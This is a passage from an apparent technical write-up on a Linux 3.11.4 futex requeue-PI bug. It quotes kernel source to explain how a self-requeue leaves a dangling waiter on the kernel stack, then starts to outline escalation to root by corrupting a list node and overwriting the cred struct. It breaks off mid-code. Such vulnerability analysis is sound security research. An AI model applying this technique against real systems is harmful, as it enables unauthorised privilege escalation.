<span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span> <span class="o">&&</span> <span class="p">(</span><span class="n">task_count</span> <span class="o">-</span> <span class="n">nr_wake</span> <span class="o"><</span> <span class="n">nr_requeue</span><span class="p">))</span> <span class="p">{</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">uaddr2</span><span class="p">,</span> <span class="n">hb1</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="o">&</span><span class="n">key1</span><span class="p">,</span>
<span class="o">&</span><span class="n">key2</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_state</span><span class="p">,</span> <span class="n">nr_requeue</span><span class="p">);</span>
<span class="cm">/*
* Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.
* Therefore the acquisition fails and 0 is returned.
* We will revisit futex_proxy_trylock_atomic below.
*/</span>
<span class="p">...</span>
<span class="n">head1</span> <span class="o">=</span> <span class="o">&</span><span class="n">hb1</span><span class="o">-></span><span class="n">chain</span><span class="p">;</span>
<span class="n">plist_for_each_entry_safe</span><span class="p">(</span><span class="n">this</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="n">head1</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">atomic_inc</span><span class="p">(</span><span class="o">&</span><span class="n">pi_state</span><span class="o">-></span><span class="n">refcount</span><span class="p">);</span>
<span class="n">this</span><span class="o">-></span><span class="n">pi_state</span> <span class="o">=</span> <span class="n">pi_state</span><span class="p">;</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">rt_mutex_start_proxy_lock</span><span class="p">(</span><span class="o">&</span><span class="n">pi_state</span><span class="o">-></span><span class="n">pi_mutex</span><span class="p">,</span>
<span class="n">this</span><span class="o">-></span><span class="n">rt_waiter</span><span class="p">,</span>
<span class="n">this</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="cm">/*
* this->rt_waiter points to the local variable rt_waiter
* in the futex_wait_requeue_pi from step 2.
* It is now added as a waiter on the new lock.
*/</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Let’s quickly glance at the code that requeues the waiter at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L962"><code class="language-plaintext highlighter-rouge">rt_mutex_start_proxy_lock()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">rt_mutex_start_proxy_lock</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">waiter</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">int</span> <span class="n">detect_deadlock</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="n">raw_spin_lock</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_lock</span><span class="p">);</span>
<span class="c1">// Attempt to take the lock. Fails because lock is taken.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">try_to_take_rt_mutex</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">))</span> <span class="p">{</span>
<span class="n">raw_spin_unlock</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_lock</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">task_blocks_on_rt_mutex</span><span class="p">(</span><span class="n">lock</span><span class="p">,</span> <span class="n">waiter</span><span class="p">,</span> <span class="n">task</span><span class="p">,</span> <span class="n">detect_deadlock</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>And inside <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L405"><code class="language-plaintext highlighter-rouge">task_blocks_on_rt_mutex()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">task_blocks_on_rt_mutex</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">waiter</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">detect_deadlock</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">owner</span> <span class="o">=</span> <span class="n">rt_mutex_owner</span><span class="p">(</span><span class="n">lock</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">top_waiter</span> <span class="o">=</span> <span class="n">waiter</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">chain_walk</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">res</span><span class="p">;</span>
<span class="p">...</span>
<span class="c1">// Set the waiter's task and rt_mutex members.</span>
<span class="n">waiter</span><span class="o">-></span><span class="n">task</span> <span class="o">=</span> <span class="n">task</span><span class="p">;</span>
<span class="n">waiter</span><span class="o">-></span><span class="n">lock</span> <span class="o">=</span> <span class="n">lock</span><span class="p">;</span>
<span class="c1">// Initialize the waiter's list entries.</span>
<span class="n">plist_node_init</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">list_entry</span><span class="p">,</span> <span class="n">task</span><span class="o">-></span><span class="n">prio</span><span class="p">);</span>
<span class="n">plist_node_init</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">pi_list_entry</span><span class="p">,</span> <span class="n">task</span><span class="o">-></span><span class="n">prio</span><span class="p">);</span>
<span class="cm">/* Get the top priority waiter on the lock */</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rt_mutex_has_waiters</span><span class="p">(</span><span class="n">lock</span><span class="p">))</span>
<span class="n">top_waiter</span> <span class="o">=</span> <span class="n">rt_mutex_top_waiter</span><span class="p">(</span><span class="n">lock</span><span class="p">);</span>
<span class="c1">// Add the waiter to the waiters list.</span>
<span class="n">plist_add</span><span class="p">(</span><span class="o">&</span><span class="n">waiter</span><span class="o">-></span><span class="n">list_entry</span><span class="p">,</span> <span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_list</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Now, <code class="language-plaintext highlighter-rouge">rt_waiter</code> of <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> is a node in the waiters list of our PI futex.</p>
<p><strong>Step 4</strong></p>
<p>Here we’ll set the userspace value of the futex, also known as the futex-word, to <code class="language-plaintext highlighter-rouge">0</code>.<br />
This is vital so that when the self-requeuing occurs,
the call to <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1202"><code class="language-plaintext highlighter-rouge">futex_proxy_trylock_atomic()</code></a> will succeed and wake the top waiter of the source futex,
which is in fact the same as the destination futex.
The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.</p>
<p>It might seem confusing at first but it’ll clear up in the next step.</p>
<p><strong>Step 5</strong></p>
<p>In this step, we’ll requeue the PI futex waiter to itself and invoke <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> once again.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">requeue_pi</span> <span class="o">&&</span> <span class="p">(</span><span class="n">task_count</span> <span class="o">-</span> <span class="n">nr_wake</span> <span class="o"><</span> <span class="n">nr_requeue</span><span class="p">))</span> <span class="p">{</span>
<span class="cm">/*
* Attempt to acquire uaddr2 and wake the top waiter. If we
* intend to requeue waiters, force setting the FUTEX_WAITERS
* bit. We force this here where we are able to easily handle
* faults rather in the requeue loop below.
*/</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">uaddr2</span><span class="p">,</span> <span class="n">hb1</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="o">&</span><span class="n">key1</span><span class="p">,</span>
<span class="o">&</span><span class="n">key2</span><span class="p">,</span> <span class="o">&</span><span class="n">pi_state</span><span class="p">,</span> <span class="n">nr_requeue</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Let’s take a look at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1202"><code class="language-plaintext highlighter-rouge">futex_proxy_trylock_atomic()</code></a> this time.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* Return:
* 0 - failed to acquire the lock atomically;
* 1 - acquired the lock;
* <0 - error
*/</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_proxy_trylock_atomic</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">pifutex</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb1</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb2</span><span class="p">,</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key1</span><span class="p">,</span> <span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key2</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_pi_state</span> <span class="o">**</span><span class="n">ps</span><span class="p">,</span> <span class="kt">int</span> <span class="n">set_waiters</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">futex_q</span> <span class="o">*</span><span class="n">top_waiter</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">curval</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">top_waiter</span> <span class="o">=</span> <span class="n">futex_top_waiter</span><span class="p">(</span><span class="n">hb1</span><span class="p">,</span> <span class="n">key1</span><span class="p">);</span>
<span class="cm">/* There are no waiters, nothing for us to do. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">top_waiter</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/* Ensure we requeue to the expected futex. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">match_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="o">-></span><span class="n">requeue_pi_key</span><span class="p">,</span> <span class="n">key2</span><span class="p">))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
<span class="cm">/*
* Try to take the lock for top_waiter. Set the FUTEX_WAITERS bit in
* the contended case or if set_waiters is 1. The pi_state is returned
* in ps in contended cases.
*/</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">pifutex</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">ps</span><span class="p">,</span> <span class="n">top_waiter</span><span class="o">-></span><span class="n">task</span><span class="p">,</span>
<span class="n">set_waiters</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">requeue_pi_wake_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">hb2</span><span class="p">);</span>
<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Pay attention to how it ensures that the <code class="language-plaintext highlighter-rouge">requeue_pi_key</code> of the <code class="language-plaintext highlighter-rouge">top_waiter</code> is equal to the requeue’s target futex’s key.
This is why we need to <strong>self-requeue</strong>, and why it <em>wouldn’t</em> be sufficient to just set the value of a different futex in userspace to <code class="language-plaintext highlighter-rouge">0</code> and requeue to it.</p>
<p>So the requirements for triggering the bug are:</p>
<ol>
<li>The requeue target is still the futex that was passed to <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a>.</li>
<li>There’s a waiter that is actively contending on the source futex.</li>
</ol>
<p>The only scenario that meets both of these conditions is a self-requeue.</p>
<p>Other than that, basically all it does is call <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L718"><code class="language-plaintext highlighter-rouge">futex_lock_pi_atomic()</code></a> and if the lock was acquired,<br />
wake up the top waiter of the source futex.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr</span><span class="p">,</span> <span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">,</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_pi_state</span> <span class="o">**</span><span class="n">ps</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">,</span> <span class="kt">int</span> <span class="n">set_waiters</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">lock_taken</span><span class="p">,</span> <span class="n">ret</span><span class="p">,</span> <span class="n">force_take</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uval</span><span class="p">,</span> <span class="n">newval</span><span class="p">,</span> <span class="n">curval</span><span class="p">,</span> <span class="n">vpid</span> <span class="o">=</span> <span class="n">task_pid_vnr</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
<span class="nl">retry:</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">lock_taken</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/*
* To avoid races, we attempt to take the lock here again
* (by doing a 0 -> TID atomic cmpxchg), while holding all
* the locks. It will most likely not succeed.
*/</span>
<span class="n">newval</span> <span class="o">=</span> <span class="n">vpid</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">set_waiters</span><span class="p">)</span>
<span class="n">newval</span> <span class="o">|=</span> <span class="n">FUTEX_WAITERS</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">cmpxchg_futex_value_locked</span><span class="p">(</span><span class="o">&</span><span class="n">curval</span><span class="p">,</span> <span class="n">uaddr</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">newval</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="p">...</span>
<span class="cm">/*
* Surprise - we got the lock. Just return to userspace:
*/</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">curval</span><span class="p">))</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function attempts to <a href="https://wiki.osdev.org/Atomic_operation">atomically</a> compare-and-exchange the futex-word.
It compares the word to <code class="language-plaintext highlighter-rouge">0</code>, the value that signals the lock is free, and if they match, replaces it with the task’s TID (<code class="language-plaintext highlighter-rouge">vpid</code> in the code above).</p>
<p>This operation is <code class="language-plaintext highlighter-rouge">unlikely</code> to succeed because the user could have taken a free lock in userspace and avoided the expensive syscall,
so the assumption is that the user failed to acquire the lock in userspace and needed the kernel’s “help”.
That’s why it would be a “surprise” if the kernel <em>was able</em> to get the lock.</p>
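<p>To make the compare-and-exchange concrete, here is a minimal userspace sketch of the same idea using C11 atomics. It is not the kernel’s code: <code class="language-plaintext highlighter-rouge">try_take_lock()</code> and <code class="language-plaintext highlighter-rouge">WAITERS_BIT</code> are hypothetical names that only mirror <code class="language-plaintext highlighter-rouge">cmpxchg_futex_value_locked()</code> and <code class="language-plaintext highlighter-rouge">FUTEX_WAITERS</code>.</p>

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirrors FUTEX_WAITERS (0x80000000); redefined so the sketch is standalone. */
#define WAITERS_BIT 0x80000000u

/*
 * Hypothetical helper: try to move the futex-word from 0 (free) to tid,
 * optionally OR-ing in the waiters bit.
 * Returns true only if the word was 0 beforehand.
 */
bool try_take_lock(_Atomic uint32_t *futex_word, uint32_t tid, bool set_waiters)
{
    uint32_t expected = 0;
    uint32_t newval = tid;

    if (set_waiters)
        newval |= WAITERS_BIT;

    /* Stores newval only when *futex_word == expected; otherwise leaves it alone. */
    return atomic_compare_exchange_strong(futex_word, &expected, newval);
}
```

<p>While the word still holds the owner’s TID, the call fails and leaves the word untouched. Once the word has been reset to <code class="language-plaintext highlighter-rouge">0</code>, the very same call succeeds, which corresponds to the “surprise” path above.</p>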
<p>Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter,
which is the waiter that was added to the waiters list on the first requeue (step 3).<br />
Because we overwrote the value in userspace (step 4), the function <strong>succeeds and wakes the waiter</strong>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ret</span> <span class="o">=</span> <span class="n">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">pifutex</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">ps</span><span class="p">,</span> <span class="n">top_waiter</span><span class="o">-></span><span class="n">task</span><span class="p">,</span>
<span class="n">set_waiters</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">requeue_pi_wake_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">hb2</span><span class="p">);</span>
</code></pre></div></div>
<p>When <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> wakes up the waiter,
it sets the <code class="language-plaintext highlighter-rouge">rt_waiter</code> to <code class="language-plaintext highlighter-rouge">NULL</code> in order to signal <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> that the atomic lock acquisition was successful.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span>
<span class="kt">void</span> <span class="nf">requeue_pi_wake_futex</span><span class="p">(</span><span class="k">struct</span> <span class="n">futex_q</span> <span class="o">*</span><span class="n">q</span><span class="p">,</span> <span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">get_futex_key_refs</span><span class="p">(</span><span class="n">key</span><span class="p">);</span>
<span class="n">q</span><span class="o">-></span><span class="n">key</span> <span class="o">=</span> <span class="o">*</span><span class="n">key</span><span class="p">;</span>
<span class="n">__unqueue_futex</span><span class="p">(</span><span class="n">q</span><span class="p">);</span>
<span class="n">WARN_ON</span><span class="p">(</span><span class="o">!</span><span class="n">q</span><span class="o">-></span><span class="n">rt_waiter</span><span class="p">);</span>
<span class="n">q</span><span class="o">-></span><span class="n">rt_waiter</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// Right here.</span>
<span class="n">q</span><span class="o">-></span><span class="n">lock_ptr</span> <span class="o">=</span> <span class="o">&</span><span class="n">hb</span><span class="o">-></span><span class="n">lock</span><span class="p">;</span>
<span class="c1">// Start scheduling the task again.</span>
<span class="n">wake_up_state</span><span class="p">(</span><span class="n">q</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="n">TASK_NORMAL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Its usage is seen here within <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Check if the requeue code acquired the second futex for us. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">q</span><span class="p">.</span><span class="n">rt_waiter</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/</span>
<span class="p">...</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cm">/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/</span>
<span class="p">...</span>
<span class="c1">// Removes the waiter from the wait_list.</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">rt_mutex_finish_proxy_lock</span><span class="p">(</span><span class="n">pi_mutex</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="o">&</span><span class="n">rt_waiter</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">...</span>
<span class="cm">/* Unqueue and drop the lock. */</span>
<span class="n">unqueue_me_pi</span><span class="p">(</span><span class="o">&</span><span class="n">q</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>And as we can see, <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L1033"><code class="language-plaintext highlighter-rouge">rt_mutex_finish_proxy_lock()</code></a> is <em>not</em> being called since <code class="language-plaintext highlighter-rouge">rt_waiter</code> is <code class="language-plaintext highlighter-rouge">NULL</code>,
and therefore the waiter is kept as-is within the waiters list.</p>
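<p>The logic error can be modelled in a few lines of plain C. This is a toy sketch under simplifying assumptions: the <code class="language-plaintext highlighter-rouge">toy_*</code> types and functions are made up for illustration, the list is an ordinary circular list rather than a <code class="language-plaintext highlighter-rouge">plist</code>, and no locking is modelled. It only shows that clearing <code class="language-plaintext highlighter-rouge">rt_waiter</code> on a waiter that is already linked makes the waiting side skip the unlink.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-ins for rt_mutex_waiter and futex_q; not the kernel's layouts. */
struct toy_waiter {
    struct toy_waiter *prev, *next;
};

struct toy_q {
    struct toy_waiter *rt_waiter;
};

/* Circular list head; the list is empty when the head points at itself. */
void toy_list_init(struct toy_waiter *head)
{
    head->prev = head->next = head;
}

bool toy_list_empty(const struct toy_waiter *head)
{
    return head->next == head;
}

void toy_list_add(struct toy_waiter *node, struct toy_waiter *head)
{
    node->next = head->next;
    node->prev = head;
    head->next->prev = node;
    head->next = node;
}

void toy_list_del(struct toy_waiter *node)
{
    node->prev->next = node->next;
    node->next->prev = node->prev;
    node->prev = node->next = node;
}

/* Requeue side: signals "lock acquired for you" but never unlinks anything. */
void toy_requeue_wake(struct toy_q *q)
{
    q->rt_waiter = NULL;
}

/* Waiting side: unlinks the waiter only when rt_waiter is still set. */
void toy_wait_side_cleanup(struct toy_q *q, struct toy_waiter *waiter)
{
    if (q->rt_waiter)
        toy_list_del(waiter);
}
```

<p>If a waiter is first linked with <code class="language-plaintext highlighter-rouge">toy_list_add()</code> and then “woken” through <code class="language-plaintext highlighter-rouge">toy_requeue_wake()</code>, the cleanup becomes a no-op and the list still references the waiter after its owner has moved on.</p>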
<h4 id="recap">Recap</h4>
<p>We start off by locking a PI-futex.
Then we simply requeue a thread to it, which creates a waiter entry on the futex’s waiters list.
Afterwards, we overwrite the futex-word with <code class="language-plaintext highlighter-rouge">0</code>. Once we requeue the waiting thread onto itself,
the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.</p>
<p><img src="https://i.imgur.com/0qp366z.png" alt="Recap Image" /></p>
<p>This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running.
Now, the waiter entry points to garbage kernel stack memory. The original <code class="language-plaintext highlighter-rouge">rt_waiter</code> is long gone and was destroyed by other function calls on the stack.</p>
<p><img src="https://i.imgur.com/Dael9DR.png" alt="Bugged Waiter Image" /></p>
<p>Our waiter, a node in the waiters list, is now completely corrupted.</p>
<h1 id="building-the-kernel">Building The Kernel</h1>
<p>I won’t go into too much depth on how I built the kernel, since there are a million tutorials out there on how to do that.
I’ll just mention that I used a 3.11.4-i386 kernel for this exploit, which I compiled in a Xenial (Ubuntu 16.04) Docker container.</p>
<p>The only actual hassle was getting my hands on the right <code class="language-plaintext highlighter-rouge">gcc</code> version for the kernel version that I worked on.
I compared the <a href="https://gcc.gnu.org/releases.html">GCC releases</a> with the <a href="https://en.wikipedia.org/wiki/Linux_kernel_version_history">Linux kernel version</a> history and tried various versions that seemed to fit by release date.
Ultimately <code class="language-plaintext highlighter-rouge">gcc-5</code> was what did the job for me.</p>
<p>It would be virtually impossible to do all of that without building your own kernel.<br />
The ability to debug the code and add your own logs to it is invaluable.</p>
<p>For actually running the kernel, I’ve used QEMU as my emulator.</p>
<h1 id="exploitation">Exploitation</h1>
<p>Now’s the time for the actual fun.</p>
<p>Ultimately, our goal is to escalate to <code class="language-plaintext highlighter-rouge">root</code> privileges.<br />
The way we’d do that is by achieving arbitrary read & write within the kernel’s memory,
and then overwriting our process’ <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct, which dictates the security context of a task.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
<span class="n">atomic_t</span> <span class="n">usage</span><span class="p">;</span>
<span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span> <span class="cm">/* real UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span> <span class="cm">/* real GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">suid</span><span class="p">;</span> <span class="cm">/* saved UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">sgid</span><span class="p">;</span> <span class="cm">/* saved GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">euid</span><span class="p">;</span> <span class="cm">/* effective UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">egid</span><span class="p">;</span> <span class="cm">/* effective GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">fsuid</span><span class="p">;</span> <span class="cm">/* UID for VFS ops */</span>
<span class="n">kgid_t</span> <span class="n">fsgid</span><span class="p">;</span> <span class="cm">/* GID for VFS ops */</span>
<span class="kt">unsigned</span> <span class="n">securebits</span><span class="p">;</span> <span class="cm">/* SUID-less security management */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_inheritable</span><span class="p">;</span> <span class="cm">/* caps our children can inherit */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_permitted</span><span class="p">;</span> <span class="cm">/* caps we're permitted */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_effective</span><span class="p">;</span> <span class="cm">/* caps we can actually use */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_bset</span><span class="p">;</span> <span class="cm">/* capability bounding set */</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The most fundamental members of <code class="language-plaintext highlighter-rouge">cred</code> are presumably the real <code class="language-plaintext highlighter-rouge">uid</code> and <code class="language-plaintext highlighter-rouge">gid</code>,
but it also stores other properties such as the task’s <a href="https://man7.org/linux/man-pages/man7/capabilities.7.html">capabilities</a> and many others.</p>
<p>But how would we go about it with nothing more than a dangling reference to that waiter?<br />
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities.
The same applies here. We’d need to find a way to write to that dangling waiter,
and then perform certain operations on it so that the kernel would do as we please.</p>
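<p>As a generic illustration of why a corrupted list node is so powerful, consider an ordinary doubly linked list. This sketch is not the exploit’s actual primitive and does not model the kernel’s <code class="language-plaintext highlighter-rouge">plist</code>; <code class="language-plaintext highlighter-rouge">struct node</code> and <code class="language-plaintext highlighter-rouge">list_insert_before()</code> are hypothetical names. The point is that a perfectly normal insertion writes through whatever the neighbouring node’s <code class="language-plaintext highlighter-rouge">prev</code> pointer holds.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Plain doubly linked list node; `next` sits at offset 0. */
struct node {
    struct node *next;
    struct node *prev;
};

/* Textbook insertion of new_node right before pos. */
void list_insert_before(struct node *new_node, struct node *pos)
{
    new_node->next = pos;
    new_node->prev = pos->prev;
    /*
     * This store goes wherever pos->prev points. If an attacker controls
     * pos->prev, the address of new_node lands in memory of their choosing.
     */
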